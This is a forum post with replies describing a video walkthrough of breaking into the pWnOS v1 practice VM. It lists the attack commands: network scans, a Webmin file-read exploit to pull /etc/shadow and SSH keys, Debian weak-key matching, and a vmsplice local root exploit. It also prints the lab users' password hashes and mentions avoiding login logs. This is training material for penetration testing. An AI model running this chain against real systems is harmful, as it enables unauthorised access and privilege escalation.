[Video] Attacking - pWnOS
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3388825
Download video: http://www.mediafire.com/?65b0nursilwfyaf
What is this?
This is my walk though of how I broke into pWnOS v1.
pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points
Scenario
A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.
It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :)
What do I need?
> BackTrack 4 (Final)
> pWnOS.vmdk
> exploit-db.com or milw0rm.
Software
Name: pWnOS
Version: 1
Home Page: http://0dayclub.com/files/pWnOS%20v1.0.zip
Download Link:
Forum/Support: http://forums.heorot.net/viewforum.php?f=21
Commands:
Code:
nmap 192.168.3.1-255
nmap -sV -sS -O 192.168.3.100
firefox http://192.168.3.100
firefox http://192.168.3.100:10000
firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin <> save. Filename: shadow
firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
http://milw0rm.com/exploits/5622 (perl)
http://milw0rm.com/exploits/5720 (python)
http://milw0rm.com/exploits/5632 (ruby)
http://www.exploit-db.com/exploits/5622 (perl)
http://www.exploit-db.com/exploits/5720 (python)
http://www.exploit-db.com/exploits/5632 (ruby)
wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
tar jxvf debian_ssh_rsa_2048_x86.tar.bz
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
*scans for the public key...*
ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
exit
ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
hostname
uname -a
firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
http://milw0rm.com/exploits/5092 (c)
http://www.exploit-db.com/exploits/5092 (c)
nano vmsplice.c
gcc vmsplice.c -o vmsplice
./vmsplice
whoami
----------------------------------------------------------------------------------------------------
Users
root: root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path tho!
This is one method of getting in, the author did say that there is multiple ways in!
It took me a bit of work to also to get it to work with virtual box & static IP addresses.
Read my post here (short answer - need configure another interface via another OS)
Song: Deadmau5 - Faxing Berlin
Video length: 07:37
Capture length: 14:55
Blog Post: http://g0tmi1k.blogspot.com/2010/04/video-pwnos.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html#post9217 OR http://forums.heorot.net/viewtopic.php?f=21&t=391&p=1956#p1956
Re : [Video] Attacking - pWnOS
Re: [Video] Attacking - pWnOS
Thank you for all these videos.
You have made a great job!!!
Re: [Video] Attacking - pWnOS
Amazing video . really liked it . Thanks for the share
Re: [Video] Attacking - pWnOS
Ow nice , good job , thanks for sharing .
Re: [Video] Attacking - pWnOS
Quote:
Originally Posted by
Shemsu-Hor
Very nice ! Thanks
Quote:
Originally Posted by
jayp75
Thank you for all these videos.
You have made a great job!!!
Quote:
Originally Posted by
D4rk357
Amazing video . really liked it . Thanks for the share
Quote:
Originally Posted by
hitasb
Ow nice , good job , thanks for sharing .
Thanks for the thanks guys!
Re: [Video] Attacking - pWnOS
Really appreciate all your videos mate, easy to follow and straight to the point, so kudos for that!
When it comes to pWnOS I have a few problems, if you don't mind.
When I fire it up in vmware, I come to the "ubuntuvm login:" screen, and I guess not having the password is basically the challenge, but the thing is I can't find it on my network? All my other VMs have net access just fine, but I have to usually do some stuff (like /etc/init.d/networking restart on bt4r1) after I'm logged in. Do you have any ideas on how to solve this?
I've tried to nmap the 192.168.110.1-255 range (where all the other VMs chill), but I just cant find it.
Tips?
Re: [Video] Attacking - pWnOS
Quote:
Originally Posted by
hucker
Really appreciate all your videos mate, easy to follow and straight to the point, so kudos for that!
When it comes to pWnOS I have a few problems, if you don't mind.
When I fire it up in vmware, I come to the "ubuntuvm login:" screen, and I guess not having the password is basically the challenge, but the thing is I can't find it on my network? All my other VMs have net access just fine, but I have to usually do some stuff (like /etc/init.d/networking restart on bt4r1) after I'm logged in. Do you have any ideas on how to solve this?
I've tried to nmap the 192.168.110.1-255 range (where all the other VMs chill), but I just cant find it.
Tips?
Thanks for the thanks.
I would like to say, just because nmap doesn't see it - how do you know its not there? You may have "tripped" something ;)
Anyway, I also had a IP issue with it - hence the few lines in the "note" section.
Quote:
It took me a bit of work to also to get it to work with virtual box & static IP addresses.
Read my post
here (short answer - need configure another interface via another OS)
